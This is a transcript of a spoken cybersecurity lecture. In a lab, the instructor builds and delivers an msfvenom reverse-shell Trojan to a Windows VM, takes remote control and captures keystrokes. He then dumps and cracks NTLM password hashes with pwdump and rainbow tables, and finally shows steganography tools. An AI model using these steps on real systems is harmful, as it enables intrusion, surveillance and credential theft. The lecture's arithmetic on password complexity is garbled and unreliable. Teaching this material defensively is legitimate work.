becoming very popular. 4.0, I think, is the 10 is the latest one. You can download it, about 4.5 GB or something will be there. Same thing, it is a Linux. You can install it with very simple applications. Okay. So now what I'm going to do, see, I want to basically, this is whenever I'm using Linux, this is hacker machine. Please remember that this is hacker machine. Whenever I'm using Windows 7, you can, whether it is Windows 7 or 8 or 10, it doesn't matter for me. This is client machine or the victim's machine. Please understand this one. Victim is 1.38 and this is hacker is Linux. Hacker is Linux. Did you understand my scenario? What I'm going to do is that now I'll hack the other machine. I'll hack this machine. I'll see what are all the contents. I'll place some files on my directory here. I can create a new folder. Maybe I'll say as GitHub. I'm keeping my files here. I'll try to hack any of these files. So I'll say maybe what I can say is I can say new. I'll say a test file. Okay, test document. Hello. Test file. Just written some content in this file. This file is there, very sensitive file, very important file and very important folder. So now I'll try to hack this directory from this particular what we call as Kali machine. Is this clear? Is this clear? Any question which you want, you can ask me. I'm demonstrating how to hack Windows 7, which are both of them in the same network. Okay. I have a question. Even if firewall is down without port forwarding, how can a malware communicate? See, again, I tell you, if firewall is only, is only an element which will protect the ports, not the virus. Okay, firewall does either it will open the ports or block the ports, or maybe that's all it will do. It has only two things, or not only the ports or a remote networks. But whereas malware can even be a virus also. Firewall doesn't think about anything, or it doesn't have any information about the virus or antivirus or something like that virus. Okay, is this clear? So only thing is that your antivirus only will take care about your virus signatures. It has a virus signatures. Based on that, it will verify whether it is a virus or not, and then it will attack. It will basically remove the signatures from the system. In that way, it comes ahead. Okay, if the firewall is down without port, yeah, that is the answer of Manoj. I have a Kali Linux installed on VM, but where do I get the other system? You have to get all the tools. Otherwise, I do not want to spoil my base system. If I do anything spoiling on my base system, if I try to hack and if it comes to a hang, then my entire presentation will go bad. So I don't generally do anything to the base system. I do everything. You can get Windows 7 or Windows XP or anything. Simple things. So all Windows platform works in the same behavior. Okay. Okay. You can ask Windows 7 download means you get ISO images. Without router port forwarding, it's difficult to communicate with public network. See, port forwarding is used for something specifically. Yeah, you can use port forwarding. Suppose if you have a port forwarding enabled in your router, you can have your own website and then you can establish that particular IP will be forwarded to this particular port if the port has the particular service. Okay, so yeah, you can try Windows 10 also installing on a Windows, on a server. The same procedure will work cold. Okay, I'll take up your questions. Let me proceed with the hacking of this particular system. Okay, so here I'll take up your questions. So here my IP, just remember this IP. My IP is 192.168.1.28. I'm also writing because while writing this, creating the Trojan, I need to mention this particular activity. So here I write 192.168.1.28. This is my Kali IP. Kali IP. And the other Windows IP is, of course, which I have noted just now, 1.38. Windows Win. It can be any other. I really don't require, but still 192.168.1.38. So I'm making a note. Now what I'm going to do, you see this one in Windows. First thing, I will create a Trojan, or we also call it a payload. Okay, here in this. A little bit of Linux background is also essential for you if you want to do this. I can even keep in full screen for a better resolution. Yeah. Okay. I can show you in full screen. Now I'll be creating a Trojan. So here what I'm going to do is I will first say this once again. There is a tool called as MSF Venom. You have to use the tool called as MSF Venom and create a what we call as the Trojan. Yeah. The file is like the command is I'm just writing. I'm trying to create a Trojan now. MSF Venom. This has all the signature files of Trojans. I'm going to use -p. I'm trying to create a Windows Trojan Meterpreter reverse TCP reverse underscore TCP hyphen platform Windows hyphen A x86 hyphen F, file type is exe file, and lhost local host is 192.168.1. My Kali IP is 28. My Kali IP is 28, and I'll use local port as 4444. This is the port which I'm going to bind the Trojan. This is the port -o, output. I can say test.exe file, any file which will be there on my home directory. Okay, so this is my creation script of Trojan. This is the creation script of Trojan. Within, I think, within a minute's time, you should be able to, the Trojan file is generated. This test.exe is a Trojan for Windows platform. Again, I repeat, MS Venom is a very, very dangerous command. -p, your options. Fail to validate localhost. I think we need to give lhost equal to. I forgot to give lhost equal to and lport equal to. Okay, now once again, the syntax is very, very essential for us to do this particular one. I repeat this one. This is the a reverse TCP means a notification. Once if the victim executes this particular file, he will get a notification to this particular IP. This IP is nothing but my what we call as my Kali Linux IP. This is the hacker's IP. So I can see a file called as test.exe is created. LL. Okay, you can see there is a file called as test.exe is created. So this is the first. Now this Trojan needs to be sent to the victim, So what I'm going to do, I'm creating a website. So in this website, if I can basically copy this file cp test.exe to var www.html. Okay, so you can verify whether that file is there or not. HTML. Yes, test.txt is there, and I can start my HTTPD restart. Okay, Apache 2, I think. Start. You can see this one. The service is now started. CD. So what happens is that let me test on my Windows 7 system. I am opening a browser. I go to this website. You just download this particular one, and what I'll say 192 168. Ask me later. 168. One 1.28. Sorry, 38 or 28. 28 is Kali Linux API. 28. I'm going to the website. I can see a Trojan. See, no one will write Trojan just like that. We download a file. I'm downloading this file here. Just say save. Okay. I'll save it on my desktop. I'm saving this file to a desktop. Close. So close. This is done. Right? So now for you I'm telling that this file which is there is a Trojan file. Once you execute, anyone who executes this file, this system gets hacked. You can see this computer. This is Windows 7 operating system. Now, meanwhile, what this fellow will do is that he has created his Trojan. He has kept the Trojan in his website, and that website is populated, is there everywhere. Okay, like most of you download from torrent sites, etc. Right? It contains a lot of Trojans. We don't know all the Trojans which are there. We simply download, we execute all the things, but simultaneously someone is watching your computer. So now here what we are doing also I'll be specifying. Where is this? Next step. First step is that we have created a Trojan. We have kept it in the website. From the website, all the victims are downloading that particular file. It is available across the network. So we saw about how to create. Now, how to open the console. We have a tool called as MSF console. This is the tool, Metasploit Framework Console. This has all various tools. See, this is the first step of how to understand about hacking. But the real hackers won't use all these tools. They directly place it into the memory, and then okay. So now the console is open. They directly use the tools, debugging tools, and they go into the system if the port is opened. To open the port also they can do. I'll show you how to open a port and all these things. But here what is this? What we call the software also opens a port. The software also opens a port called as 4444 once you are executing. You can try that. As of now, if I see this in new tab, nmap 192.168 38 is my Windows IP. 38 is my Windows IP. Let me see what all the ports open now, because I have not executed. After execution, you can see the port 4444 also opening. So as of now, 135, 139, 444, this is. I keep these things aside now. So now I am basically giving some more commands and see that my console is open. Once the victim executes that particular file, you can see a backdoor coming to this particular location. What you can do from the backdoor also, we will see what happens. So here, what I'm going to do is use, exploit multi-handler. These are simple steps which are there. Multi-handler, you can see this one, and set payload. The thing which you have set is Windows. Once again, Researching. Okay, interpreter and reverse TCP. I'm setting the payload so that the execution, whatever it executed, it comes here. Okay, set lhost. My IP address is 192.168.1.28. This is my local, that is hacker's IP. Set L port 4444. Okay, so I had set all the things which are there, and now I can say show options. Show options. The elements which are there, payload options I had set. Okay, and then the local host I had set, the local port I had set, L port also I had set everything. Now go for exploit. Go for exploit -j -z. I mean, you can do it in background also, this exploit. Okay, so run. You can see this exploit is running in background job, but no session was started. So this is now this has been started here. What will happen now if I go to Windows system and execute? Where is this Windows? Okay, I'll just minimize this one. You see this particular one. Now I will try to execute this Windows. Just run this one, nothing more. This test is a Windows executable program created by the Kali. This is a Trojan. I had just execute. Nothing happened now. Nothing happened. But something has happened here. You can see here what has happened. I'll show you. View full screen. What is this? Okay. Just what is this? Run as administrator. Yes. You see here, meanwhile, I had run the program, which is a Trojan. You can see here, a backdoor is open now. A backdoor is open now. You can see here. And I can interact with the session, -I and 1 with that session. Now, this fellow, Windows doesn't know anything. It doesn't know anything. He'll just use whatever files he wants, whatever files he wants. But this system is now hacked. This system is now hacked. You can see what all things a hacker can do. What all things a hacker can do. You see this one? First, he will try to try what is the information, what is the system type. He'll see sysinfo. He'll come to know, oh, this is a Windows 7 system, x86, so and so, and all these things which are there. Okay, even he can figure out the various commands. He can access even webcam, everything off the remote webcam. But since both systems are the same, we may not be able to get all this information. But if the systems are different, we can get webcam list, or even he can take a snap from the webcam also. He'll come to know who is sitting over there. Okay. Anyway, the other things which you can see is basically like maybe key scan dump, or maybe key scan, all these things. The shell is also there. I'll show you. So shell. Okay. In shell, if you say shell, you can see the C prompt coming here. Okay. The desktop files are there. The Geetam folders are there. You can see this one. Hello. Type or cat. Type hello.txt. You can see all the file contents also. He can download. He can bring whatever he wants. He can bring whatever he wants. But this fellow, Windows 7, he doesn't know anything. He doesn't know anything. So this is the behavior of the Trojan. This is the behavior of the Trojan. This is here he does only his task. But since he has executed a wrong software, there is a port which has been opened, which is called as 4444. You can see this one now. I'm trying to do again for the Windows system now. It should show this 44. I think the Windows firewall is not showing that, but there is a port opened which over there. There is a port opened of 4444, which is communicating to this point. To this point, he can even bring many other things also. Sysinfo. He can get many other things also, like he can say help. Not only shell, but also he can get even R desktop also, remote desktop. I'll show you how R desktop, if the feature is there, you should be able to get, I think, a remote desktop of that particular IP, of that element, if he comes to know the user. And there are some more things, key scan also, which is there. you might be familiar with key scan dump and all these things. So what I'm going to do is key scan. I mean, I can say key scan, scan dump. I think start. Okay, sniffer. It has started the sniffer part. Okay, dump. Okay, no, start. Sorry, already the things are being dumping. Here, whatever actions which you are doing, suppose if you have opened a browser or even if you have opened a notepad or trying to do whatever is the actions here, the key scans will come to know. It will be dumped into the new text. If I try to type password, ESSWRD, hello. Okay, save. So he'll come to know whatever you are typing. Like I'll say here dump. You can see what all he has typed. Gitam, CR, hello, passcode, right shift, whatever the characters which are there. Is this clear? Is this clear? I have shown you basic and fundamental. I know that within 10-15 minutes you will not be able to become an expert, but I am telling you how hacking happens in the reality. Whether it is your Windows 7 system or Linux system, nothing is safe if you are executing some kind of potentially malicious software. You know that it is a malicious software, but the victim doesn't know that it is a malicious software. Is this clear? Is this clear? I can open my chat. If you want to ask any questions, yes, you can ask. So there is a question like how long can the hacker have the access? That is called as maintaining access, right? Do see until unless you change the passcode, the same passcode, he has the access to the system. You have basically a backdoor established to the system. As long as he doesn't reboot the system, he has access. If he reboots again, he can have what this hacker meanwhile do. He'll keep that, since he has access to that particular operating system, he'll keep the trojan.exe in the startup file. So that at any point of time, whenever he executes that, that file will be executed on its own. So then he'll get connections every time. In that way, it depends on the hacker's mentality and the low security which we keep the systems. Can we access the mobile phone using the Trojan? Yes, I'll be demonstrating on Monday, not today. I'll be showing you also. See, process is very same. You can even hack the mobile, but there we are creating an Android Trojan instead of exe Trojan. Here we have created Windows Trojan, but there I am creating an Android Trojan. Yeah, it is there. It is there in my even in my YouTube videos also. You can go through that if you are really interested of how I have done. My channel is there, Anand.k. You can go through all the videos of what all I'm demonstrating in the class. Everything is there. Not only this, the videos on cloud, videos on maybe what we call as Red Hat Linux, all the things are available over there. Okay, so the next question is, yes, how can we know that it is malicious software or not? No, I don't know. I don't know. Your antivirus software will come to know. Your antivirus software will come to know. I'll show you here. If I'm using here, I do not know whether I have an antivirus. Here I have an antivirus here. You see this one? This is an Avast and you are saying it is protected on my base system. You can see this one. This is a base system. If I try to download the same software on my base system, what will it say? You can see 192.168 1.28. Okay, I'll try to download. I'll say save link as. It will not allow, antivirus will not allow. I'll say on the desktop, I'll say save. Where is this test? If I say somewhere in E drive, let me say in E drive, okay, and if I go to E drive, this it's not allowing to even save the file also. Okay, this is test.exe. Okay, like I can show you test.exe saved in cache into my E drive. All right, it's not allowing also. It's not allowing to save. It's not. It will not allow. Network error. Antivirus, yes, it has detected and it will throw it into trash. It will throw it into trash. You can do that. There are some binders. That is the reason some binders, what they do, they either save it in MS Word file or something like that. And then after downloading into your system, it gets renamed automatically and then gets executed. But antivirus are very intelligent. They also try to figure out that these type of trojans are behaving like this and it will remove it. That is the reason why every system needs to be protected with antivirus. If there is no antivirus, if you are disabling it, probably you can see the file getting downloaded. I'll show you how after maybe for a minute's time, I will keep this antivirus disabled. Okay, I'll disable for 1 hour. Okay, I know that this is danger, but let me show you how I can. But even though if this is disabling, your firewall also will not allow. Your firewall also will not allow because it knows that this type of softwares will open 4444 port or Defender firewall or something like that. Okay, let me see. Let me see now if I'm able to download this file because I had disabled this. You have to try save link as and test. Yeah, it has now downloaded. You see this one test? It has downloaded. Previously it is not. Previously it is not because your antivirus is not allowed. I will just enable this antivirus. Okay, enable all shields. What will happen? You'll see now. So I have enabled now. Okay, it's running. You are protected. If I try to touch this file, what will happen? You know. Okay, they say run. I think antivirus is not fully, yeah, it has removed the file. It has removed the file. It will not allow these files. You saw the file has gone. The file has gone as soon as you open this antivirus. They will not allow all this thing. It comes to know. But I'll tell you one condition. Because antivirus came to know that it is a Trojan, it has deleted. If it doesn't know, if the new Trojans has come, new virus or new Trojans has come, and if this is not updated, it has a signature, so it has thrown into the dustbin. If you do not update, then what will happen? Then you will become a victim. You will become a victim. That is how this antivirus behaves. That is how your antivirus behaves. So you can steal anything. You can steal anything here. You can. So this is how you basically hack the system. You basically hack the system. Is this clear? Is this clear? Any questions of system hacking? Any questions from anyone? Okay, that's fine. That's fine. So now until now you have seen a presentation of how this antivirus, how basically creation of a Trojan. There are 3 phases: creation of Trojan. It's not Windows weak. In my system, in my VMware, I did not have any antivirus. You see here, it's only plain operating system. This is for demonstration purpose I had kept. It's not weak. I made it weak. I made it weak. You might be asking whether is the firewall enabled? Yes, the firewall is enabled. You can see this. You go to control panel, you will understand whether my firewall is there or not. Firewall is enabled, but only thing, yeah, you see this, it is enabled. It is green. Only thing is that there is no antivirus, there is no proper protection. Because of that, it has been hacked. Is this clear? How to fix? The fix is only ensure that your antivirus is up to mark. Antivirus or your real-time sheets, we call it real-time sheets, is up to mark and scanning from time to time. So if you don't If you don't have any such type of things, data is not guaranteed. Data is not guaranteed. Okay. Okay, sir. Okay, sir. I think if someone joins, then can someone become a co-host? That should be better, basically. Can someone respond so that the edition and members can be admitted?
So I'll be the co-host.
Your name, just type it across so that I can easily.
In chat, I responded, sir.
You responded? Okay, okay. I got it. Participants, Abhishek, right?
Yes, sir.
Okay. Yeah. So is this clear about this hacking? System hacking. This is the third phase. But before that, we have something more additional things which we need to know about this. So now I'll be telling about attacks. I'll be telling about attacks. So there are many type of attacks. I'll give the notes of attacks also some other time, but I'll show you now. We'll start with password attacks. I'll demonstrate with password attacks. Okay. So here the same thing which I'm going to use now in Windows. Here this is the thing which is there. In Windows, what I'm going to do, I'll create some users. Okay. How do I create users? It can be Windows or Windows Server or whatever it is. Okay. The same thing. I'll go to manage and then create the users. Some 3 or 4 users. Okay. So how to hack passwords? How to hack passwords of Windows? Okay, users. See here, I'm trying to create some users and then I will try to hack the passwords. So here, new user, user 1. Okay, I'm not telling any password of this. I'm not saying this particular one, password never expires. Okay. So passcodes are of many types. One is plain dictionary passwords. Password never expires. The other type is what you can say is a complex password. Complex password, which is called as I'll create 3 or 4 users, then I'll go into the class. So password I'll give here is I created 3 users here itself. Okay. So now, yeah, I'll be mentioning about this passcodes once again. Okay. In the attacks, we are discussing about this password attacks. So there are first type of attacking which we normally come through is guessing. If you know a user, so and so idea of maybe either a Gmail or maybe passcode of a user account of a Hotmail or something like that, or maybe Facebook or something. Normally, people, 90% of the people, not 90%, at least 25-30% of the people can keep the passwords based on their date of birth or the place where they have come from. Something like that. They know it's very easily. Guessing means some 3 or 4. If he is from Vizag or from so and so, his date of birth or year of birth. Many of us, they keep their ATM as maybe if they are born on maybe 24th of September 2409. That is their passcode for ATM. So if they come to know the ATM card or something like that, with 2 or 3 trials, he may be able to be successful. So this type of attacks are called as guessing. Anyway, guessing, there is no computer intervention. It's only what we call as it's only something unscientific method. There is no scientific method. There is no algorithm. Nothing like that. if his marriage anniversary is like this, if this kid's name is like that. So something like that. They keep normally which their beloved names or something like that, which they come into as a password. But let me move ahead a little bit higher. The first type of password which we call as, okay, which we call a dictionary attack. The common words which are placed in the dictionary, like the text characters are more or less simple characters. I mean, once if you say simple characters means the 26 characters which are there in what we call as in the English, whether it is small or caps, that's all. So you have a combination of 2 power 26 only, that's all, nothing more. So it's not that much, it's not that much, but not a big dictionary to create and then try to hack it. That is how it's not 26, 2 power 26, it is 26 factorial. That is the number of combinations where you can have alphabets. But whereas a complete more complex, we call as hybrid, means you have basic text characters as well as complex characters, which is also called as brute force attack. So here in this type of attack, you have 26 small characters, 26 big characters, 10 from what we call as numericals, and 18 special. So total you have about 80 characters. So that is a big spectrum. 80 factorial is very big. 80 factorial is very big. So it will take more time. In that also 80 characters, if you are having 4 characters or 5 characters, easy to hack. So the suggested is you should not have 26 character set and keep the passcode. You should have first one is that you should have 80 character set. That means complex. One from each factor. One from small, one from big, one for numericals, one from special. So what will happen? That 80 combinations will work. 80 combinations will work. And minimum of 7 characters are required. So that means 80 factorial into, you see the combinations, into 7 factorial. 80 factorial into 7 factorial, that is 7 into 6 into 5 into 4 into 3 into 1, that much number. Already 80 factorial is very big. If it is 6 factorial, it is less complex. 7 factorial is 7 times much higher. Okay, 8 factorial means 8 into 7. So suggested is minimum complexity which should be there and 7 characters should be there. If you are having 8 numbers, it takes at least 1 month to hack. 1 month with the tools. That's why there is a password policy in corporates that they should not have minimum of less than 7 characters or 8 characters. And also once in every 15 days they have to change the password. Why? Because even if someone is trying to hack with tool also, it will take 1 month, and before that he is changing the password once again. And that password should not be the repeat of previous 5 passwords, 5 or 6. That is how the password complexity comes into the picture, especially. So that otherwise admin can do anything. Admin can do anything. So now we will learn about how you can hack these passwords. I have not given all passwords is complex. Simple passwords I have given. So I will perform a dictionary attack and show you how I can gain the passwords. So this is my Windows 7 system. Already I have all the tools. You can see this tool. So where is this? Mounted across in my CD drive. So here what I'm going to do is system hacking. So in this system hacking, the tool which I am doing is for your understanding. This is pwdump which I am doing, and I'm just extracting onto the desktop. And also I'll be showing you this what we call as this rainbow crack, and also these 3 tools which I'm downloading now, which I'm keeping it in the desktop. Okay, so here I'll say as new folder. I'll say as tools. I'll keep all the others. It will be messy at a later stage. So these 2-3 tools. I'm going into command prompt CMD. Okay, I'll execute this particular one. Run as a some dangerous tools are there. pwdump is not an easy ordinary tool. It is a dangerous tool. CD desktop. Okay, so here I have tools. Okay, you see this dir cd pwdump 7. These are the three tools. One tool I'm specifying this particular one, which is called as PW dump. PW dump. You can see this tool. What it does. Before I explain about, before I run this particular tool of PW dump, I'll explain about how Windows store the passcodes. Whether it is, see, I'm not worried about any desktops, Windows 7 or 8 or 10. But if you go to the industry, you have several, servers coming across. So everyone will try, including admin also, she will try to see that whether the password is vulnerable or whether the passwords can be hacked for. Suppose if he is an admin of a system, I'll tell you an example, don't think seriously. You are an admin of one of the organization. Maybe you take it as a steel plant or an STL or maybe shipyard. So where all the users, including your boss, including your boss's boss, the CEO, also may be user of the system. And all the passcodes are centrally stored in the server. Now, if you are the admin, do you think that you have right that you can see the passcode of your boss? No, absolutely no. If he has any trouble, he may ask you to reset the passcode. But you are not supposed to ask password which he has said previously. No. In organization, it is crime. You will be immediately terminated if you ask anyone's password or sharing a password. If your HR comes to know that anywhere the sharing of password is happening, both people will be suspended. So that is serious crime. No one should basically, the password should be managed automatically. Now what this dump tool does is that all the Windows users and passwords which are stored inside this server, they are stored in a encrypted format that is called as hashing. In Windows, we use a function called as hashing. You know about cryptography, right? If not, please read this. Cryptography is very, very essential topic. We are going to cover some areas of cryptography in our due course. So here in Windows, we are using the technology one-way hashing. With one-way hashing, we are using what we call as one-way hashing. That is the algorithm, basically. There are three types of popular algorithms: symmetric, asymmetric, and one-way algorithm. One-way hashing. In one-way hashing, Linux servers uses MD5. You know about MD5, meta-digest file. That is also a hashing algorithm. Here we use NTLM. NTLM is the algorithm which we use, which is basically a hashing algorithm. So here, all this, whenever I say PW dump, the stored hash file will be shown across. I'll tell you how this hashing functions. Some of you might be aware, but I'll tell you hashing means only encryption. There is no concept of decryption. Okay, there is no concept of decryption. So as and when you log in into the server, you will be questioned with your password. Once you give your password, it will again convert into hashes. The hash file which is stored inside the system is compared with the new hash code which you have entered. If it is matching, you are logged in. Otherwise, no. That is how Windows operate. That is how Windows operate, and that is how hashing also operate. It doesn't have any form of decryption. So you can maintain a dictionary. With help of dictionary, for every hash values, you can have a word which is there, having a word. So with that word also, you can say that decrypted, that there is no, but there is no logic for that. So now I'm going to do this pwdump.exe and see this. You see this, all the user files, usernames, and the passcode is now dumped across. You can see this one, the passcode is being dumped across. You see, the first one is your username star or user one. You see this particular one which is there. This is the this particular value, each of 4 bits into 32, which is 32 or I think 40. I think 160 bits will be there. 32, 128. I think, if I clear. I'm not sure what is the NTLM passcode hash value. I think 40 into 4, 160 byte. So this is the hash value. So now we will create a hash dump. I'll say I'll export to a file called as maybe pass.txt. So now it has exported to a pass file. So here this file is there, pass.txt. You can see this file. Is this clear? The first step is that we have, but you may ask me, if your hash file is coming, then what is the security? This is one of the reasons that You are not supposed to allow such type of tools in the industry. If you are taking this tool, PW dump, and if you are running on the server, you will get the whole list of users with hash file, whole list. So that's why it is strongly encouraged that this type of tools should not be executed or should not be there in the system at any point of time. These are vulnerable tools, vulnerable. So because it brings out the hash file from your SAM. SAM is nothing but security authentication manager. Okay, system authentication or manager, administrative authentication manager. So from that, and then it dumps into this particular file. So now you have the dump file. So now you know the importance, right? If you are not making the secure, your entire organization will collapse. Now how to hack the files which are there. And the first step is I have got the hash file. Second step is now I will try to decode this hash file. There are multiple ways of decoding. There are some crack station net or something like that. You can copy these values and then you can even decode it. That is crackstation.net, which is there. Okay, so that is one way. Or the other way is that you can generate your own, I mean what we call as the rainbow table crack generation. I'll show you how you can do on your own. So here a PW dump is done. So how to generate the rainbow tables? Rainbow tables are nothing but your hash tables. So here I'm trying to show you how you can create the rainbow tables. So there is which is a very small file in RTGen. RTGen is nothing but rainbow table generation. So you can create a table, add table, what type of hashing function you want. I want NTLM, whichever. If you want MD5, you can create MD5 table. All these are hashing algorithms only. All these are hashing algorithms. So I am using this NTLM hashing algorithm. Minimum character, maximum character. I'll say maximum character of maybe minimum length is from 4 and maximum character of 6, 7. I'm only showing you. If you increase the length, automatically the size will increase. The size will increase. Here itself you can see the size, and I do not want to increase the size. I'm showing you how you can create a file, create a dictionary file. What does the dictionary contain? One side it will have the words, the other side it will have the hash codes. So now you have the hash codes. From the hash codes you can match out and bring out the passcode. That is our agenda. That we will do it in the third step. But here in this rainbow table generation, I am trying to create a dictionary file. I am trying to create a rainbow table file which contains the hash values as well as the character set. So here I want to select the character set, whatever character set. I will try to create a lower alpha. These are the alphabets which are there. If you want more, you can try with all lower alpha with numeric. These are all the character set which is there. Or lower alpha with the special characters also you can create accordingly. Higher alpha, mix alpha, all these things also. But for our experiment, I'm using only 26 character set. And chain count is how much the size which you want. I do not want the size to go in depth about that. So here now if I say okay, and the file is getting generated now. File is, if you say okay, the file should start. The creation of rainbow file will start. Where is that? Yeah, sorry, I made it as an exit. Again, I'll say Windows NTLM. The minimum size is 4, maximum size is 6. Okay, and then chain count I'll reduce to one more less, and lower alphabet I'll try. Lower alpha, where is this lower alpha? Okay, so and say okay. Is already present in the list. Oxid. So you can download this tool in oxid.it. Okay, and just say start. I think fast it has created. I think yes, it has created already here. This is 62 MB, which the file has been created. Yes, the file has been created. You can see here, right? 62 MB a file is created, which contains all these hash values. Now, once you have this dictionary, once you have this kind of rainbow table, you can run this crack. I'm just running this crack file, add a hash value from this file. Suppose if I want to get this hash value, I will see like this. I will copy this hash value of user one, and say okay. So first one I have, till now it is not yet decoded because we have not shown the rainbow table dictionary file. We have to show where it is and then ask to crack means it will try to crack. I will show this one also. File, maybe at a time I want to add the hash values and say user 2 and this is for user 3. This is of 7 fields: user 1, username, user ID, and the 4th field is your hash value. And the 5, 6, 7 we generally use for what we call as policies. I mean password aging policy, which we call aging policy. File, add hash, user 3 and say okay. Done. So now I'll say search for the rainbow tables. Rainbow tables is there on my desktop in that particular directory. Okay. The tools, rainbow, I mean generation, this is the one. It's trying to search the dictionary. Let me see. You can see at the bottom the status. Yeah, you see the second one is already hacked. I mean the password has come, which is stars. I think the first one I have given 7 characters. I have created only 6 characters. Network I have given yeah, 7 characters. So it is not shown. The fourth one I have given, the third one I have given as star star. The 8 characters I have given. It is not. Otherwise, you can see your passcode coming across. This is 5 character one. It is easily. So the dictionary is of 4 to 6 characters only. That's why the first one has not come. The third one has not come. The second one has been decoded. Is this clear, everyone? This is how I mean the password attacks happen. These password attacks can happen. Yes, if you want, you can ask any questions. Password attacks happen across. There are no questions? That's good. So everything understood? Please let me know at least. We did the password attack. Yeah, you have this Kalila. See, I'll tell you, this is 3 different tools I have shown you. 3 different tools. But if you go to any, tools like I can say password cracking tools, just say in internet, you'll get it. You'll get it. Just run there. If there is less security, you will get direct passcodes also. Direct passcodes also. There are some specific enterprise, all 3 bundles to a single one. Okay. With Kali Linux also is possible. Yes, we have. I think one is one tool which is called a John. John is there. You can try doing with John. Let me see. What is this tool? John is there. Yes, it is there. You can have past the dumps created, and with the John the Ripper, we also call this a John the Ripper, and you can get the passwords. Okay, password hash files which is there. You can crack the files. You have this one. If you can get the manual also. Please search this for this from this software. You'll get it. John can do. Okay, so please try that. Please try that up. See, each and every we have more number of exercises, more. But I'm trying to maximize. The idea is to get only essentials, but still we are doing some exercises. You can do that, right? I have given you indication. Yes, you can do that. And there are many tools also which are embedded along with. Please do that. Or even you can go to YouTube and say that, John, how it works. Very simple, very simple. Get the hash dump and then just show the hash dump file. It will decode. It will decode. I'll show you WP scan at a later stage, WordPerfect scan or something, where you can decode the passcodes in Windows, in Linux also. In Linux, you can do that. There is also a vulnerability scanning tool, WP scan. In SQL injection, I'll show you. Okay, so that's about the attack, password attack. Still more attacks are there. I'll be speaking about attacks more. And then now I'll also be speaking about now in our today's session, the lab on steganography. So most of you have heard about that steganography. So steganography is nothing but the what we call as the art of hiding. Here in our aspect, the hiding of data, hiding of images inside an image, or what type of it can. The data can be in any form. It can be image, or it can be text, or it can be file, or anything which is there. So we will try to figure out some of the steganography, how people do. They keep a file, and inside that file they'll keep a hidden text. Okay, they'll secure that. So while opening the file, you may be thinking that, oh, only this particular file only, but there is a hidden secret data. So how to hide files inside an image? There are some people, oh, okay, oh, when you open the file, oh, your fancy Virat Kohli photograph will be coming across, but we don't know what is there behind that. You can see that that is called as steganography. And also, I'll be showing you how to hide a file within a file. So if you open a file, you may be seeing a beautiful picture, but inside that you can keep MS Word file or something like secret file, you can keep it and then transmit it. So if anyone hacks also, they'll come to know, oh, this is an ordinary picture, it will not be traceable. It will not be traceable. This is called a steganography. Lot of type of steganographies are there. Especially in the areas of piracies, this happens. I also tell you in steganography what will happen. They will hide the trojans inside and then they'll send it to you. You open the Word file, the trojan is planted. You open the Word file, you'll be thinking it is only a Word file, but there is something which is complementary along with that, which is a trojan, and it is planted inside your system. In that way, it happens. So we will learn about this steganography now. This is also a kind of terminology which is used in cyber security. Please understand this one. So I'll be showing you this in Windows. So this is clear about this password attacks. Okay. So now I'm deleting these tools which are there. Okay, these 3 tools I'm deleting. Okay, and of course this test is also not required, and of course this one is also, anyway, this is nothing to do. Yeah, now for steganography, as I explained now, what we need is the first one is where is this? This is snow. I'll tell you about the snow. I can show you about this quick stego. This is image steganography. Quick stego. Stealth is nothing but your file steganography. Okay, so I'll keep all these 3 things in my tools. So I'll run this C prompt. I'll then run this CMD. I think some of you might have heard this one, the steganography. Oops. Go to snow. This is text steganography. This is text steganography. What we are going to do is, I'll tell you, in this text steganography, I'll create a file first. I'll create a file on maybe in snow or whatever it is. I'll create a new file, normal text file. Hello. Okay, I'll add some file. This is a okay, so it is about 1 KB file. It's showing as 1 KB. You can see the same file here also. You can see the same file here also in my C prompt. If you say type hello.txt is, it will display the contents. Now I will add some secret information into this file. Secret information into this file. But still, if you open the file, it will not show you. How to do that? You embed the text, secret text, using this snow. Using this snow hyphen capital C hyphen M for modify, and give the secret message. My Swiss bank account number is 01234567890. Okay, so this is secret message. Secret message. I am storing this password with, I mean, Geeta. Okay, I'm providing this. I'm securing this one. What is the file name? What is the file name? File name is hello.txt. What is the new file name which I want to do? Hello.txt. Hello.txt. Now, what it does, an extra 7 lines has been added. Here you have a new file. Hello new is there. You see this one? Hello new. If you open this file, still you see the same contents. Still you see the same contents, and the file size is same, 1 KB only. And now happily you transmit this to your friend. I'm deleting the source file. Not required for me now. So this file is there. But this file has some stego contents. On receiving the file from the other side, what he will do? He will decode what is the message. This fellow will tell the passcode through telephone. Hey, passcode is Gita. So what he will do now? Snow -c -p for password is Gitam hello new.txt. You can see the message, secret message behind this. So this is called as steganography. If you give something else, wrong password, okay, if you give wrong password, it will not show you. It will not show you the content. It will not show you the content. Is this clear about this text steganography? This is also a kind of hacking. This is also a kind of cheating the members by not getting yourself directly known to the members. This is a text steganography. Yeah, is this clear? Yeah, there are, I think, then exe files can be hidden in the same fashion. This is related to steganography. Vamshi. Okay. I'll tell you about exe files. This is text steganography. Snow can be used for text steganography. Is this clear till now? Okay. So I'll be showing you next image steganography. I'll show you the image steganography. So this is about text which I have done. In image steganography, just take this quick stego. You have this particular one. Just install this quick stego. Very simple. Just say finish. So you have an icon here. Okay. You can delete all the junk files which are there. You can open this file. So this is a steganography for image. So here a sample image is also there along with me. Lamborghini is there. So what I'm going to do, I'll open this beautiful car. Where is this? In desktop. In tools. Quick stego. The file is there. Okay. There is a JPG file. It's an ordinary file. This is an ordinary file. So now what I'm going to do, I will open some important text. So here there is some text contents, password and hello is there. Okay, I'll copy this text information and say paste it. Hide the text. Okay, I have this text. Now if you say hide the text, it will throw a message. The text message is now hidden in image. In this image, this text is there. And save it. You can say there is a save. Okay. Save text. Not the save text. Save image. Okay. On my desktop, I'm saving. I am saving with a different one. Maybe I can say Gitam dot. Not Gitam. I'll say maybe text dot image file. Okay. I'm saving this. I'm exiting. So now this file, if you open, it's a normal car file. It's a normal, but it has some information behind. So how do you get the information? Again, what you can do is you can open this quick stego. This has some limited features, but still you can see you cannot keep password for this one. If you want, you have to go for a full version. Desktop. Open this text. You see the information coming across. Information which is hidden inside the. This is called as image steganography. This is called as image steganography. Is this clear? I'm deleting all these things. Is this clear? Any questions? Okay. So no questions. So now I'll be showing you the stealth steganography. Stealth means you take a file, data file, a carrier file. Carrier file is visible to members. Your secret file, carrier file. You include this file inside the carrier. So anyone who opens the carrier will only see the carrier file. Okay, and at the destination, you remove the carrier, you will get the secret file. Is this clear? That is called a stealth. I'll show you that. That is again very simple. I'll show you. So here I'll keep this stealth. One file is there. So, but before that, I will create Gitam is one very important file. This is called as the secret file. I'm keeping it on the desktop itself. I'll name it as secret. Very 